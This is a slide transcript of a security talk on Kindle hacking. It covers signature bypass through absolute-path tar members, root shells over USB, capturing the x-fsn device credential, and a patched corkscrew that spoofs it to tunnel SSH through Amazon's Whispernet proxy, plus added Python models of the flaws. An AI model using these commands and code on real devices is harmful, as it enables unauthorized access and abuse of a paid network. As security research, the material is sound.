Slide transcript (uploaded 16-Dec-2015)

School of Computer and Security Science

Edith Cowan University

Hooray for Reading The Kindle and You

Peter Hannay

[email protected]

http://openduck.com


The Kindle

• Capabilities
  – Whispernet
  – Commerce
  – Information Gathering

• Update Security

• Getting a Shell

• Tunnelling


Capabilities

• Reads books

• Various versions

• ARMv6 device, runs Linux



Whispernet

• International roaming cellular network

• Service provided by AT&T and Sprint (and international partners)

• Access determined by home location, not current location

• AT&T: VPN to kindleatt1.amazon.com

• Sprint: custom, no VPN; the tunnel opens after sending some AT commands


Whispernet

• Extremely restrictive network

• You can speak to three hosts:
  – fints-g7g.amazon.com (proxy)
  – 207.171.165.149 (DNS)
  – 207.171.165.150 (DNS)

• The DNS servers drop any request that isn't for fints-g7g.amazon.com


Commerce

• You can buy books (depending on your home region & current location)

• Create new amazon account with address in desired region, use gift cards, buy books on device

• Create new amazon account with address in desired region, use gift cards, buy books on web (with region correct proxy) and manually transfer to device


Information Gathering

• AGPS is used to determine the current location of every device

• These devices report home every now and again

• This is used to control content distribution


Update Security

• Updates must be signed

• The signature is checked against an RSA key held on the device

• Updates are basically tar files

• The device unpacks these tar files prior to the signature check

• It just runs tar on them, as root

• So what if we specify the full path of the file we want to write?


• Yeah it works.

• This is used to add an additional RSA key for authenticating updates

• Igor Skochinsky & Jean-Yves Avenard have written libfreekindle and the firmware update tool that use this principle.

• http://www.avenard.org/kindle2/ (awesome)

• It works well.
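An added example, not code from the talk or from libfreekindle: a Python model of the ordering bug the last two slides describe. The archive is unpacked before the signature is checked, and member names are used exactly as stored, so a member whose name is an absolute path is written wherever the archive says, signature or no signature. The keyed hash standing in for the device's RSA key, the staging directory /tmp/update-staging and the file names inside the constructed archive are all hypothetical.

```python
# Added example (not from the talk): extract-then-verify, modelled in Python.
# Hypothetical/constructed: DEVICE_KEY (a keyed hash stands in for the
# device's RSA key), EXTRACT_ROOT, and every member name built below.
import hashlib
import hmac
import io
import os
import tarfile

DEVICE_KEY = b"constructed-device-update-key"   # stand-in for the on-device RSA key
EXTRACT_ROOT = "/tmp/update-staging"            # hypothetical staging directory


def sign(blob: bytes, key: bytes = DEVICE_KEY) -> bytes:
    return hmac.new(key, blob, hashlib.sha256).digest()


def verify(blob: bytes, sig: bytes, key: bytes = DEVICE_KEY) -> bool:
    return hmac.compare_digest(sign(blob, key), sig)


def build_update(members: dict) -> bytes:
    """Construct an in-memory tar 'update' from {member_name: content}.
    TarInfo/addfile store the name verbatim, leading '/' or '..' included."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name, data in members.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            info.mode = 0o644
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def member_names(blob: bytes) -> list:
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r") as tf:
        return [m.name for m in tf.getmembers()]


def target_path(root: str, name: str) -> str:
    """Where an extractor that honours member names as given (tar -P
    behaviour) writes this member. os.path.join discards root when name
    is absolute, which is exactly the trick the slides describe."""
    return os.path.normpath(os.path.join(root, name))


def escapes_root(root: str, name: str) -> bool:
    """True if the member would land outside root (absolute or '..' names)."""
    root_abs = os.path.abspath(root)
    target = os.path.abspath(target_path(root, name))
    return os.path.commonpath([root_abs, target]) != root_abs


def naive_install(blob: bytes, sig: bytes, root: str = EXTRACT_ROOT):
    """The order on the device: unpack first (as root), check the signature
    afterwards. Returns the paths already written by the time verify() runs,
    plus the now-irrelevant verification result."""
    written = [target_path(root, n) for n in member_names(blob)]
    return written, verify(blob, sig)


def safe_install(blob: bytes, sig: bytes, root: str = EXTRACT_ROOT) -> list:
    """Verify before touching the archive, then refuse any member that
    would land outside root. Returns the paths that would be written."""
    if not verify(blob, sig):
        raise ValueError("bad signature: archive not extracted")
    paths = []
    for n in member_names(blob):
        if escapes_root(root, n):
            raise ValueError(f"member {n!r} escapes {root}")
        paths.append(target_path(root, n))
    return paths


if __name__ == "__main__":
    evil = build_update({"/etc/hypothetical-keys/extra.pem": b"ATTACKER KEY\n"})
    # The unsigned archive still gets its file written before verify() fails.
    print(naive_install(evil, b"\x00" * 32))
```

GNU tar strips a leading "/" unless run with -P, and BusyBox and other implementations differ, so the fix is not to rely on the tool's defaults: check the signature before the archive is opened at all, and reject absolute or ".." member names yourself before extraction.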


Getting a shell

• So, we need a shell on the device.

• There is a usbnet package that has been created which configures the USB port as an Ethernet device.

• Install the package (drop it onto the device and press the update button)

• Type ;debugOn (into the search field on the Home screen)

• Type ~usbNetwork


• Attach cable

• Set local IP to something in the 192.168.2.0/24 subnet

• SSH/telnet to 192.168.2.2

• All good.


Getting a Shell

• There is a value passed to the proxy to identify your device.

• This value is inserted prior to initial shipment.

• This is the only authentication mechanism; this value lets you buy things.

• A Kindle can buy books from Amazon without any authentication other than this value.

• This worries me.


Whispernet Tunneling

• We need to find out the super secret value... but how? (Yeah, I couldn't figure out where it's stored, but that's OK.)

• The proxy host is configured in three files:

/opt/amazon/ebook/config/framework.mario.conf

/opt/amazon/ebook/config/browser_prefs

/opt/amazon/ebook/config/framework.fiona.conf

HTTP_PROXY_HOST : fints-g7g.amazon.com

• Let's change that to localhost and capture what the device sends to it


Whispernet Tunneling

sed -i 's/fints-g7g.amazon.com/127.0.0.1/g' framework.mario.conf
sed -i 's/fints-g7g.amazon.com/127.0.0.1/g' browser_prefs
sed -i 's/fints-g7g.amazon.com/127.0.0.1/g' framework.fiona.conf

With the proxy pointed at localhost, a listener on port 80 sees exactly what the browser sends (the real x-fsn value is redacted in the slides):

[root@kindle bin]# ./netcat -l -p 80
GET http://en.m.wikipedia.org/ HTTP/1.1
Accept: image/png, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Host: en.m.wikipedia.org
User-Agent: Mozilla/4.0 (compatible; Linux 2.6.22) NetFront/3.4 Kindle/2.3 (screen 600x800; rotate)
Proxy-Connection: Keep-Alive
Accept-Encoding: deflate, gzip
x-fsn: BIG MAGIC VALUE GOES HERE
x-appNamespace: WEB_BROWSER
x-appId: Kindle_2.2


Compiling Stuff

• Kindle doesn’t come with netcat, dig, corkscrew, a compiler and a lot of other things.

• cs2007q3-glibc2.5-arm6 toolchain works


Whispernet Tunneling

• So we modify corkscrew, so that its CONNECT request carries the same Host, User-Agent and x-fsn headers the Kindle's own browser sends; to the proxy it then looks like the device:

strncpy(uri, "CONNECT ", sizeof(uri));
strncat(uri, desthost, sizeof(uri) - strlen(uri) - 1);
strncat(uri, ":", sizeof(uri) - strlen(uri) - 1);
strncat(uri, destport, sizeof(uri) - strlen(uri) - 1);
strncat(uri, " HTTP/1.1", sizeof(uri) - strlen(uri) - 1);
strncat(uri, linefeed, sizeof(uri) - strlen(uri) - 1);
strncat(uri, "Host: ", sizeof(uri) - strlen(uri) - 1);
strncat(uri, desthost, sizeof(uri) - strlen(uri) - 1);
strncat(uri, ":", sizeof(uri) - strlen(uri) - 1);
strncat(uri, destport, sizeof(uri) - strlen(uri) - 1);
strncat(uri, linefeed, sizeof(uri) - strlen(uri) - 1);
strncat(uri, "User-Agent: Mozilla/4.0 (compatible; Linux 2.6.22) NetFront/3.4 Kindle/2.1 (screen 600x800)", sizeof(uri) - strlen(uri) - 1);
strncat(uri, linefeed, sizeof(uri) - strlen(uri) - 1);
strncat(uri, "x-fsn: \"BIG MAGIC VALUE GOES HERE\"", sizeof(uri) - strlen(uri) - 1);
strncat(uri, linefeed, sizeof(uri) - strlen(uri) - 1);


Whispernet Tunneling

• Have to kill a couple of daemons: netwatchd and watchdogd

• These things like to close connections and the like.

/etc/init.d/netwatchd stop
/etc/init.d/watchdogd stop


Whispernet Tunneling

• So now we open up a tunnel. corkscrew (-J) talks to the Whispernet proxy on port 80 and asks it to CONNECT to IP:443; dbclient runs SSH over that pipe with a 5-second keepalive (-K 5), and -L 31337:IP:22 forwards local port 31337 to port 22 on the far end (IP stands for the author's own server, left out of the slides):

./dbclient kronicd@IP -K 5 -J "corkscrew fints-g7g.amazon.com 80 IP 443" -g -L 31337:IP:22
kronicd@IP's password:
Linux boxen 2.6.32-5-486 #1 Thu Aug 12 12:59:56 UTC 2010 i586

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Nov 21 08:57:55 2010 from IP
kronicd@boxen:~$ exit
logout
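An added example, not code from the talk or from corkscrew: both halves of the CONNECT exchange the patched corkscrew performs, on loopback so it runs offline. The client side assembles the same request the strncat chain above builds; the stand-in proxy opens the tunnel only when x-fsn carries the expected value, which is the point the slides make about that header being the device's only credential. ACCEPTED_FSN, the echo "upstream" behind the proxy and the SSH banner used as tunnel payload are constructed.

```python
# Added example (not from the talk or from corkscrew). Client and stand-in
# proxy for the CONNECT handshake on loopback; the proxy gates the tunnel
# on x-fsn alone. Constructed: ACCEPTED_FSN, the echo upstream, the payload.
import socket
import threading

KINDLE_UA = ("Mozilla/4.0 (compatible; Linux 2.6.22) NetFront/3.4 "
             "Kindle/2.1 (screen 600x800)")
ACCEPTED_FSN = "CONSTRUCTED-FSN-0001"   # stand-in for the per-device value


def build_connect_request(desthost, destport, fsn, ua=KINDLE_UA):
    """Same shape as the strncat chain in the modified corkscrew."""
    lines = [f"CONNECT {desthost}:{destport} HTTP/1.1",
             f"Host: {desthost}:{destport}",
             f"User-Agent: {ua}",
             f'x-fsn: "{fsn}"',
             "", ""]
    return "\r\n".join(lines).encode()


def parse_head(raw):
    """Return (first line, {lower-case header: value}, bytes after the head)."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    lines = head.decode(errors="replace").split("\r\n")
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return lines[0], headers, rest


def _recv_head(sock):
    raw = b""
    while b"\r\n\r\n" not in raw:
        chunk = sock.recv(4096)
        if not chunk:
            break
        raw += chunk
    return raw


def _handle(conn):
    """Proxy side: x-fsn is the only thing checked. After a 200 every
    tunnelled byte is echoed back (the echo stands in for the upstream)."""
    with conn:
        first, headers, rest = parse_head(_recv_head(conn))
        fsn = headers.get("x-fsn", "").strip('"')
        if not first.startswith("CONNECT ") or fsn != ACCEPTED_FSN:
            conn.sendall(b"HTTP/1.1 403 Forbidden\r\n\r\n")
            return
        conn.sendall(b"HTTP/1.1 200 Connection established\r\n\r\n")
        conn.sendall(rest)
        while True:
            data = conn.recv(4096)
            if not data:
                return
            conn.sendall(data)


def start_proxy():
    """Stand-in proxy on an ephemeral loopback port; returns its socket."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # srv.close() ends the loop
                return
            threading.Thread(target=_handle, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv


def open_tunnel(proxy_port, desthost, destport, fsn,
                payload=b"SSH-2.0-dbclient\r\n"):
    """Client side (corkscrew's job for dbclient): send CONNECT and, on a
    200, push the inner protocol's first bytes. Returns (status, reply)."""
    with socket.create_connection(("127.0.0.1", proxy_port)) as s:
        s.sendall(build_connect_request(desthost, destport, fsn))
        status, _, _ = parse_head(_recv_head(s))
        reply = b""
        if status.startswith("HTTP/1.1 200"):
            s.sendall(payload)
            while len(reply) < len(payload):
                chunk = s.recv(4096)
                if not chunk:
                    break
                reply += chunk
    return status, reply
```

Run it with `proxy = start_proxy()` and `open_tunnel(proxy.getsockname()[1], "example.invalid", 22, ACCEPTED_FSN)`: the correct x-fsn gets "HTTP/1.1 200 Connection established" and the payload back, any other value gets a 403 and no tunnel, which is the whole of the access control the header provides.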


Questions
